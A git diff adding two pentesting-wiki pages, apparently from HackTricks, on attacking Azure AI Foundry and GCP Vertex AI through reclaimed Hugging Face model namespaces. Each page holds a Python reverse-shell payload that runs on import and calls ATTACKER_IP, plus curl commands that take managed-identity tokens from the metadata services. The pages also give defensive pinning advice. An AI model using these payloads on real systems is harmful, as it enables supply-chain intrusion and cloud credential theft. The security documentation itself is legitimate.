diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 1cedf02053..7d93f52b05 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -96,6 +96,7 @@ - [GCP - Pub/Sub Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md) - [GCP - Secretmanager Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md) - [GCP - Security Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md) + - [Gcp Vertex Ai Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md) - [GCP - Workflows Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md) - [GCP - Storage Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md) - [GCP - Privilege Escalation](pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md) @@ -461,6 +462,7 @@ - [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.md) - [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.md) - [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md) + - [Az Azure Ai Foundry Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md) - [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md) - [Az - CosmosDB Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md) - [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md) diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/README.md b/src/pentesting-cloud/azure-security/az-post-exploitation/README.md index 234962b1c8..52b7c1b91e 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/README.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/README.md @@ -2,4 +2,8 @@ {{#include ../../../banners/hacktricks-training.md}} +{{#ref}} +az-azure-ai-foundry-post-exploitation.md +{{#endref}} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md new file mode 100644 index 0000000000..959e01d3b2 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md @@ -0,0 +1,104 @@ +# Azure - AI Foundry Post-Exploitation via Hugging Face Model Namespace Reuse + +{{#include ../../../banners/hacktricks-training.md}} + +## Scenario + +- Azure AI Foundry Model Catalog includes many Hugging Face (HF) models for one-click deployment. +- HF model identifiers are Author/ModelName. If an HF author/org is deleted, anyone can re-register that author and publish a model with the same ModelName at the legacy path. +- Pipelines and catalogs that pull by name only (no commit pinning/integrity) will resolve to attacker-controlled repos. When Azure deploys the model, loader code can execute in the endpoint environment, granting RCE with that endpoint’s permissions. + +Common HF takeover cases: +- Ownership deletion: Old path 404 until takeover. +- Ownership transfer: Old path 307 to the new author while old author exists. If the old author is later deleted and re-registered, the redirect breaks and the attacker’s repo serves at the legacy path. + +## Identifying Reusable Namespaces (HF) + +```bash +# Check author/org existence +curl -I https://huggingface.co/ # 200 exists, 404 deleted/available + +# Check model path +curl -I https://huggingface.co// +# 307 -> redirect (transfer case), 404 -> deleted until takeover +``` + +## End-to-end Attack Flow against Azure AI Foundry + +1) In the Model Catalog, find HF models whose original authors were deleted or transferred (old author removed) on HF. +2) Re-register the abandoned author on HF and recreate the ModelName. +3) Publish a malicious repo with loader code that executes on import or requires trust_remote_code=True. +4) Deploy the legacy Author/ModelName from Azure AI Foundry. The platform pulls the attacker repo; loader executes inside the Azure endpoint container/VM, yielding RCE with endpoint permissions. + +Example payload fragment executed on import (for demonstration only): + +```python +# __init__.py or a module imported by the model loader +import os, socket, subprocess, threading + +def _rs(host, port): + s = socket.socket(); s.connect((host, port)) + for fd in (0,1,2): + try: + os.dup2(s.fileno(), fd) + except Exception: + pass + subprocess.call(["/bin/sh","-i"]) # or powershell on Windows images + +if os.environ.get("AZUREML_ENDPOINT","1") == "1": + threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start() +``` + +Notes +- AI Foundry deployments that integrate HF typically clone and import repo modules referenced by the model’s config (e.g., auto_map), which can trigger code execution. Some paths require trust_remote_code=True. +- Access usually matches the endpoint’s managed identity/service principal permissions. Treat it as an initial access foothold for data access and lateral movement within Azure. + +## Post-Exploitation Tips (Azure Endpoint) + +- Enumerate environment variables and MSI endpoints for tokens: + +```bash +# Azure Instance Metadata Service (inside Azure compute) +curl -H "Metadata: true" \ + "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" +``` + +- Check mounted storage, model artifacts, and reachable Azure services with the acquired token. +- Consider persistence by leaving poisoned model artifacts if the platform re-pulls from HF. + +## Defensive Guidance for Azure AI Foundry Users + +- Pin models by commit when loading from HF: + +```python +from transformers import AutoModel +m = AutoModel.from_pretrained("Author/ModelName", revision="") +``` + +- Mirror vetted HF models to a trusted internal registry and deploy from there. +- Continuously scan codebases and defaults/docstrings/notebooks for hard-coded Author/ModelName that are deleted/transferred; update or pin. +- Validate author existence and model provenance prior to deployment. + +## Recognition Heuristics (HTTP) + +- Deleted author: author page 404; legacy model path 404 until takeover. +- Transferred model: legacy path 307 to new author while old author exists; if old author later deleted and re-registered, legacy path serves attacker content. + +```bash +curl -I https://huggingface.co// | egrep "^HTTP|^location" +``` + +## Cross-References + +- See broader methodology and supply-chain notes: + +{{#ref}} +../../pentesting-cloud-methodology.md +{{#endref}} + +## References + +- [Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust (Unit 42)](https://unit42.paloaltonetworks.com/model-namespace-reuse/) +- [Hugging Face: Renaming or transferring a repo](https://huggingface.co/docs/hub/repositories-settings#renaming-or-transferring-a-repo) + +{{#include ../../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md index e241336969..8f4597e1ad 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md @@ -2,4 +2,8 @@ {{#include ../../../banners/hacktricks-training.md}} +{{#ref}} +gcp-vertex-ai-post-exploitation.md +{{#endref}} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md new file mode 100644 index 0000000000..b43cf5669d --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md @@ -0,0 +1,123 @@ +# GCP - Vertex AI Post-Exploitation via Hugging Face Model Namespace Reuse + +{{#include ../../../banners/hacktricks-training.md}} + +## Scenario + +- Vertex AI Model Garden allows direct deployment of many Hugging Face (HF) models. +- HF model identifiers are Author/ModelName. If an author/org on HF is deleted, the same author name can be re-registered by anyone. Attackers can then create a repo with the same ModelName at the legacy path. +- Pipelines, SDKs, or cloud catalogs that fetch by name only (no pinning/integrity) will pull the attacker-controlled repo. When the model is deployed, loader code from that repo can execute inside the Vertex AI endpoint container, yielding RCE with the endpoint’s permissions. + +Two common takeover cases on HF: +- Ownership deletion: Old path 404 until someone re-registers the author and publishes the same ModelName. +- Ownership transfer: HF issues 307 redirects from old Author/ModelName to the new author. If the old author is later deleted and re-registered by an attacker, the redirect chain is broken and the attacker’s repo serves at the legacy path. + +## Identifying Reusable Namespaces (HF) + +- Old author deleted: the page for the author returns 404; model path may return 404 until takeover. +- Transferred models: the old model path issues 307 to the new owner while the old author exists. If the old author is later deleted and re-registered, the legacy path will resolve to the attacker’s repo. + +Quick checks with curl: + +```bash +# Check author/org existence +curl -I https://huggingface.co/ +# 200 = exists, 404 = deleted/available + +# Check old model path behavior +curl -I https://huggingface.co// +# 307 = redirect to new owner (transfer case) +# 404 = missing (deletion case) until someone re-registers +``` + +## End-to-end Attack Flow against Vertex AI + +1) Discover reusable model namespaces that Model Garden lists as deployable: +- Find HF models in Vertex AI Model Garden that still show as “verified deployable”. +- Verify on HF if the original author is deleted or if the model was transferred and the old author was later removed. + +2) Re-register the deleted author on HF and recreate the same ModelName. + +3) Publish a malicious repo. Include code that executes on model load. Examples that commonly execute during HF model load: +- Side effects in __init__.py of the repo +- Custom modeling_*.py or processing code referenced by config/auto_map +- Code paths that require trust_remote_code=True in Transformers pipelines + +4) A Vertex AI deployment of the legacy Author/ModelName now pulls the attacker repo. The loader executes inside the Vertex AI endpoint container. + +5) Payload establishes access from the endpoint environment (RCE) with the endpoint’s permissions. + +Example payload fragment executed on import (for demonstration only): + +```python +# Place in __init__.py or a module imported by the model loader +import os, socket, subprocess, threading + +def _rs(host, port): + s = socket.socket(); s.connect((host, port)) + for fd in (0,1,2): + try: + os.dup2(s.fileno(), fd) + except Exception: + pass + subprocess.call(["/bin/sh","-i"]) # Or python -c exec ... + +if os.environ.get("VTX_AI","1") == "1": + threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start() +``` + +Notes +- Real-world loaders vary. Many Vertex AI HF integrations clone and import repo modules referenced by the model’s config (e.g., auto_map), which can trigger code execution. Some uses require trust_remote_code=True. +- The endpoint typically runs in a dedicated container with limited scope, but it is a valid initial foothold for data access and lateral movement in GCP. + +## Post-Exploitation Tips (Vertex AI Endpoint) + +Once code is running inside the endpoint container, consider: +- Enumerating environment variables and metadata for credentials/tokens +- Accessing attached storage or mounted model artifacts +- Interacting with Google APIs via service account identity (Document AI, Storage, Pub/Sub, etc.) +- Persistence in the model artifact if the platform re-pulls the repo + +Enumerate instance metadata if accessible (container dependent): + +```bash +curl -H "Metadata-Flavor: Google" \ + http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token +``` + +## Defensive Guidance for Vertex AI Users + +- Pin models by commit in HF loaders to prevent silent replacement: + +```python +from transformers import AutoModel +m = AutoModel.from_pretrained("Author/ModelName", revision="") +``` + +- Mirror vetted HF models into a trusted internal artifact store/registry and deploy from there. +- Continuously scan codebases and configs for hard-coded Author/ModelName that are deleted/transferred; update to new namespaces or pin by commit. +- In Model Garden, verify model provenance and author existence before deployment. + +## Recognition Heuristics (HTTP) + +- Deleted author: author page 404; legacy model path 404 until takeover. +- Transferred model: legacy path 307 to new author while old author exists; if old author later deleted and re-registered, legacy path serves attacker content. + +```bash +curl -I https://huggingface.co// | egrep "^HTTP|^location" +``` + +## Cross-References + +- See broader methodology and supply-chain notes: + +{{#ref}} +../../pentesting-cloud-methodology.md +{{#endref}} + +## References + +- [Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust (Unit 42)](https://unit42.paloaltonetworks.com/model-namespace-reuse/) +- [Hugging Face: Renaming or transferring a repo](https://huggingface.co/docs/hub/repositories-settings#renaming-or-transferring-a-repo) + +{{#include ../../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/pentesting-cloud/pentesting-cloud-methodology.md b/src/pentesting-cloud/pentesting-cloud-methodology.md index d3eb7a6596..bc79cb2d39 100644 --- a/src/pentesting-cloud/pentesting-cloud-methodology.md +++ b/src/pentesting-cloud/pentesting-cloud-methodology.md @@ -454,6 +454,7 @@ azure-security/ You need **Global Admin** or at least **Global Admin Reader** (but note that Global Admin Reader is a little bit limited). However, those limitations appear in some PS modules and can be bypassed accessing the features **via the web application**. + {{#include ../banners/hacktricks-training.md}}